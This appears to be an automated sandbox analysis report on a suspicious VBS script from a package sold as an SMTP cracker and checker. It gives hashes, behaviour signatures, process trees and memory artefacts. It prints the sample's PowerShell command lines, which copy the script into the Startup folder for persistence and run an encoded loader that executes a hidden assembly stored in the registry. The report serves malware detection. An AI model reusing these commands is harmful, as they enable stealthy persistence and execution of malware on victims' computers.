508f09d617bdc253cd56b8a4a8cba65f87c21f7054da0963fc90dce621554640

Analysis

max time kernel
66s
max time network
83s
platform
windows10-1703_x64
resource
win10-20230220-en
resource tags

arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
submitted
17-03-2023 16:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

FR4UDS SMTP CRACKER & CHECKER WITH PROXY SCRAPER/various/smtp.vbs
Size

62KB
MD5

ad077b50e620fc0b715f423aef6a51ae
SHA1

05a7a3ab1788598673679b94c7ade8c7bb4d05ae
SHA256

b4f286bc808ca2099328f599d503550f8cfd283162a55e6f106664baf5bc6f06
SHA512

a0c17fbdd58949886673d1f5ca31ad049c4ec5911610f039176fa349aba317f12e073f24a478aff811bdc1772e9ce4b198a96eb935760a5a357654dd5754e24d
SSDEEP

1536:oyt+ecUFsGGHKr8UOpk4tatxwf86qYGYNm:oy8lUiY1lCGom

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exe

pid process

4580 powershell.exe
4376 powershell.exe
4376 powershell.exe
4580 powershell.exe
4376 powershell.exe
4580 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 4580 powershell.exe
Token: SeDebugPrivilege 4376 powershell.exe

pid	process
4580	powershell.exe
4376	powershell.exe
4376	powershell.exe
4580	powershell.exe
4376	powershell.exe
4580	powershell.exe

description	pid	process
Token: SeDebugPrivilege	4580	powershell.exe
Token: SeDebugPrivilege	4376	powershell.exe

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

WScript.exe

description	pid	process	target process
PID 4344 wrote to memory of 4580	4344	WScript.exe	powershell.exe
PID 4344 wrote to memory of 4580	4344	WScript.exe	powershell.exe
PID 4344 wrote to memory of 4376	4344	WScript.exe	powershell.exe
PID 4344 wrote to memory of 4376	4344	WScript.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FR4UDS SMTP CRACKER & CHECKER WITH PROXY SCRAPER\various\smtp.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:4344

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nOpROFILE -eXECUTIONpOLICY BYPASS -window 1 -NOLOGO Copy-Item 'C:\Users\Admin\AppData\Local\Temp\FR4UDS SMTP CRACKER & CHECKER WITH PROXY SCRAPER\various\smtp.vbs' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IPCONFIG.VBS';
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4580

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nOpROFILE -eXECUTIONpOLICY BYPASS -window 1 -NOLOGO -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABOAFkAQQBOAHgAQwBBAFQAXAApAC4ATgBZAEEATgB4AEMAQQBUACkAOwAgACQAdABlAHgAdAAgAD0AIAAtAGoAbwBpAG4AIAAkAHQAZQB4AHQAWwAtADEALgAuAC0AJAB0AGUAeAB0AC4ATABlAG4AZwB0AGgAXQA7ACAAWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAB0AGUAeAB0ACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBJAG4AdgBvAGsAZQAoACQATgB1AGwAbAAsACQATgB1AGwAbAApADsA
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4376

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
f6c90ab0db80c6c3ea92556fda7273c7

SHA1
01d3866b1887cbb0abe9701f6b49c5dbc66a7dfa

SHA256
a823c3b6f157c50315251d43db740ad37a736b967f0500e024e3a0f84192b269

SHA512
aa6b71e3a8fa46702787d190e3633b1ead0f66cce81065fa2262dde59c683a7fc48846fa2b0bbe94a050564855fc7a79842f0abfa53cc3315e4c766b3c4c1fbe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
dec0f16acbaf53509efe1a49b14a85d1

SHA1
e9d72e4240f93cb51dbaf66cb2995e33d8f41b5b

SHA256
c7d07d3e40a966a808eb6ab4fcf90d87051798d4172c02c21a5a9695fd4bafc8

SHA512
71eda9a5522cfa2b658cb2bd5e6ea2625bffae1dda4ded6e2df047155f956565e111f55a9fb98c3a89c73605eaf4ae3269398c33243272a1c6a42a24db618e17

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rv2eyrmp.wvx.ps1
Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
memory/4376-131-0x000001C9F88C0000-0x000001C9F8936000-memory.dmp

Filesize
472KB

Download
memory/4376-167-0x000001C9F88B0000-0x000001C9F88C0000-memory.dmp

Filesize
64KB

Download
memory/4376-168-0x000001C9F88B0000-0x000001C9F88C0000-memory.dmp

Filesize
64KB

Download
memory/4580-127-0x000002AE92EB0000-0x000002AE92ED2000-memory.dmp

Filesize
136KB

Download
memory/4580-165-0x000002AE92EA0000-0x000002AE92EB0000-memory.dmp

Filesize
64KB

Download
memory/4580-166-0x000002AE92EA0000-0x000002AE92EB0000-memory.dmp

Filesize
64KB

Download
memory/4580-169-0x000002AE92EA0000-0x000002AE92EB0000-memory.dmp

Filesize
64KB

Download